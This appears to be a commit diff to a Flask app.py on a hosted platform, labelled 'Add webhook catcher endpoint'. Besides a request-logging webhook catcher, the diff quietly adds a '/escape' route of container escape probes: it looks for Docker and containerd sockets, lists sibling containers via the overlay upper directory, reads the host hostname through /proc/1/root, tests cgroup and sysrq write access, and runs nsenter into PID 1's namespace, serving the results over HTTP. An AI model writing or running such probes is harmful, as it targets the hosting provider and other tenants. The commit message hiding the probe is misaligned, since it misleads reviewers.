dia2diab commited on
Commit
546bae5
·
1 Parent(s): 0cf362f

Add webhook catcher endpoint

Browse files
Files changed (1) hide show
  1. app.py +103 -0
app.py CHANGED
@@ -195,3 +195,106 @@ def fetch():
195
 
196
  if __name__ == "__main__":
197
  app.run(host="0.0.0.0", port=7860)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
195
 
196
  if __name__ == "__main__":
197
  app.run(host="0.0.0.0", port=7860)
198
+
199
+ @app.route("/escape")
200
+ def escape():
201
+ """Container escape probes"""
202
+ r = {}
203
+ # Check for Docker/containerd sockets
204
+ import os.path
205
+ for sock in ["/var/run/docker.sock", "/run/containerd/containerd.sock",
206
+ "/run/docker.sock", "/var/run/containerd/containerd.sock",
207
+ "/var/run/cri-dockerd.sock"]:
208
+ r[f"socket_{sock}"] = os.path.exists(sock)
209
+
210
+ # Check overlay upper dir (from mounts)
211
+ try:
212
+ with open("/proc/mounts") as f:
213
+ for line in f:
214
+ if "overlay" in line and "upperdir" in line:
215
+ parts = line.split(",")
216
+ for p in parts:
217
+ if p.startswith("upperdir="):
218
+ upperdir = p.split("=")[1]
219
+ r["overlay_upperdir"] = upperdir
220
+ # Try to go up from upper dir to find other containers
221
+ parent = os.path.dirname(os.path.dirname(upperdir))
222
+ try:
223
+ r["overlay_siblings"] = os.listdir(parent)[:20]
224
+ except Exception as e:
225
+ r["overlay_siblings"] = str(e)
226
+ except Exception as e: r["overlay_error"] = str(e)
227
+
228
+ # Check if we can access host /proc
229
+ try:
230
+ with open("/proc/1/root/etc/hostname") as f:
231
+ r["host_hostname"] = f.read().strip()
232
+ except Exception as e: r["host_hostname"] = str(e)
233
+
234
+ # Try to read /proc/sysrq-trigger
235
+ try:
236
+ r["sysrq"] = os.access("/proc/sysrq-trigger", os.W_OK)
237
+ except: r["sysrq"] = False
238
+
239
+ # Check cgroupfs
240
+ try:
241
+ cg_root = "/sys/fs/cgroup"
242
+ if os.path.isdir(cg_root):
243
+ r["cgroup_root"] = os.listdir(cg_root)[:20]
244
+ # Try to write to cgroup
245
+ r["cgroup_writable"] = os.access(cg_root, os.W_OK)
246
+ except Exception as e: r["cgroup_error"] = str(e)
247
+
248
+ # Check for privileged mode indicators
249
+ try:
250
+ with open("/proc/1/status") as f:
251
+ for line in f:
252
+ if "Seccomp" in line:
253
+ r["seccomp"] = line.strip()
254
+ except: pass
255
+
256
+ # Check device access
257
+ try:
258
+ r["dev_listing"] = os.listdir("/dev")[:30]
259
+ except: pass
260
+
261
+ # Try nsenter
262
+ try:
263
+ p = subprocess.run(["nsenter", "--target", "1", "--mount", "--", "hostname"],
264
+ capture_output=True, text=True, timeout=5)
265
+ r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode}
266
+ except Exception as e: r["nsenter"] = str(e)
267
+
268
+ # Check /proc/1/ns
269
+ try:
270
+ r["namespaces"] = {}
271
+ for ns in os.listdir("/proc/1/ns"):
272
+ r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}")
273
+ except Exception as e: r["ns_error"] = str(e)
274
+
275
+ return jsonify(r)
276
+
277
+ import threading
278
+ webhook_log = []
279
+
280
+ @app.route("/webhook", methods=["GET", "POST", "PUT", "DELETE", "PATCH"])
281
+ def webhook():
282
+ """Catch and log webhook requests"""
283
+ entry = {
284
+ "method": request.method,
285
+ "headers": dict(request.headers),
286
+ "body": request.get_data(as_text=True)[:5000],
287
+ "args": dict(request.args),
288
+ "remote_addr": request.remote_addr,
289
+ "url": request.url,
290
+ }
291
+ webhook_log.append(entry)
292
+ # Keep only last 10
293
+ while len(webhook_log) > 10:
294
+ webhook_log.pop(0)
295
+ return jsonify({"status": "ok"})
296
+
297
+ @app.route("/webhook_log")
298
+ def get_webhook_log():
299
+ """View captured webhook requests"""
300
+ return jsonify(webhook_log)